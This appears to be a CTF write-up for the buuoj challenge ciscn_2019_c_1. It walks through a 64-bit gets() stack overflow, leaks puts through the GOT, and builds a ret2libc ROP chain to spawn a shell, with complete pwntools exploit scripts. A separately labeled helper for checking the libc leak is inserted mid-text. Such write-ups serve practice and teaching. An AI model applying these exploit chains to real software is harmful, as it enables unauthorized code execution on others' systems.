ciscn_2019_c_1
2022-07-23 23:33:00 【Long street 395】
1. Inspecting the file
Running file ciscn_2019_c_1 shows the file format:

Running checksec ciscn_2019_c_1 shows the protections:
64-bit, with NX and ASLR both enabled, so nothing is handed to us for free.
2. Decompiling in IDA
We find two main functions:
main:

encrypt():
However, there is no system() call or backdoor function, and NX is enabled, so you have to build the ROP chain yourself.
The basic idea: the gets() call inside encrypt() can overflow; the stack buffer size is 50h. puts() can be used to leak the libc base address.
The gets() call gives us an overflow point with offset = 0x50+8.

Using ROPgadget we find the pop rdi ; ret gadget at 0x400c83.
3. Building the exploit
exp:
from pwn import *
from LibcSearcher import *

r = remote("node4.buuoj.cn", 26336)
elf = ELF("./ciscn_2019_c_1")

ret = 0x400c83            # pop rdi ; ret gadget (found with ROPgadget)
plt = elf.plt['puts']     # puts@plt, used to print the leak
got = elf.got['puts']     # puts@got, the entry whose contents we leak
main_addr = 0x400B28      # return to main afterwards for a second input

r.recv()
r.sendline(b"1")          # choose the encrypt option
r.recvuntil(b"encrypted\n")
# 0x58 bytes of padding (0x50 buffer + 8 bytes saved rbp), then puts(puts@got) and back to main
p = b"a" * 0x58 + p64(ret) + p64(got) + p64(plt) + p64(main_addr)
r.sendline(p)
r.recvuntil(b"Ciphertext\n")
r.recvuntil(b"\n")
addr = u64(r.recv(6).ljust(0x8, b"\x00"))   # 6 leaked bytes, zero-padded to 8
libc = LibcSearcher("puts", addr)
libcbase = addr - libc.dump("puts")
print(libcbase)
Libc base address (output):
Continuing the exploit:
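An added sanity check on the leak step above (example code, not part of the original writeup): it decodes the 6-byte puts address the same way the exploit does and verifies the derived libc base before the offsets from LibcSearcher are trusted. The sample leak bytes and the puts offset 0x80820 are constructed values, not from this challenge.

```python
# Added example, not from the original writeup: decode the leaked puts address
# and check that the libc base derived from it is plausible before using it.
import struct

# Constructed sample: 6 bytes as puts() would print them (little-endian, the
# two high zero bytes dropped) and a made-up puts offset; not challenge values.
SAMPLE_LEAK = b"\x20\x48\x0f\x5a\xbe\x7f"
SAMPLE_PUTS_OFFSET = 0x80820


def u64_from_leak(raw: bytes) -> int:
    """Same decoding as u64(r.recv(6).ljust(8, b"\\x00")) in the exploit:
    a 1..8 byte little-endian value, zero-padded to a full 8 bytes."""
    if not 1 <= len(raw) <= 8:
        raise ValueError("an x86-64 address leak must be 1..8 bytes")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def offset_matches(leaked: int, offset: int) -> bool:
    """ASLR shifts libc by whole pages, so the low 12 bits of the leaked
    address must equal the low 12 bits of the symbol's offset inside libc.
    A mismatch means the libc build that produced the offset is wrong."""
    return (leaked & 0xFFF) == (offset & 0xFFF)


def libc_base_from_leak(leaked: int, offset: int) -> int:
    """libc base = leaked address - symbol offset, refusing implausible input."""
    if not offset_matches(leaked, offset):
        raise ValueError("low 12 bits differ: symbol offset is from the wrong libc")
    if offset >= leaked:
        raise ValueError("offset exceeds the leaked address")
    return leaked - offset


if __name__ == "__main__":
    leaked = u64_from_leak(SAMPLE_LEAK)
    print(hex(leaked), hex(libc_base_from_leak(leaked, SAMPLE_PUTS_OFFSET)))
```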
from pwn import *
from LibcSearcher import *

r = remote("node4.buuoj.cn", 26336)
elf = ELF("./ciscn_2019_c_1")

ret = 0x400c83            # pop rdi ; ret gadget
plt = elf.plt['puts']
got = elf.got['puts']
main_addr = 0x400B28

# Stage 1: leak puts@got through puts@plt and return to main
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
p = b"a" * 0x58 + p64(ret) + p64(got) + p64(plt) + p64(main_addr)
r.sendline(p)
r.recvuntil(b"Ciphertext\n")
r.recvuntil(b"\n")
addr = u64(r.recv(6).ljust(0x8, b"\x00"))
libc = LibcSearcher("puts", addr)
libcbase = addr - libc.dump("puts")
print(libcbase)

# Stage 2: main runs again; this time call system("/bin/sh")
r.recv()
r.sendline(b"1")
r.recvuntil(b"encrypted\n")
sys_addr = libcbase + libc.dump('system')
bin_sh = libcbase + libc.dump('str_bin_sh')
res = 0x4006b9            # a bare ret gadget: realigns the stack to 16 bytes before system()
p1 = b"a" * 0x58 + p64(res) + p64(ret) + p64(bin_sh) + p64(sys_addr)
r.sendline(p1)
r.interactive()
After this step you can get the flag.
Just cat flag directly:
But I ran into this problem here:
timeout: the monitored command dumped core
At this point it offers many choices:
Let's try another option.
Summary
It's really annoying; I ran into three different types of problems today and I'm worn out.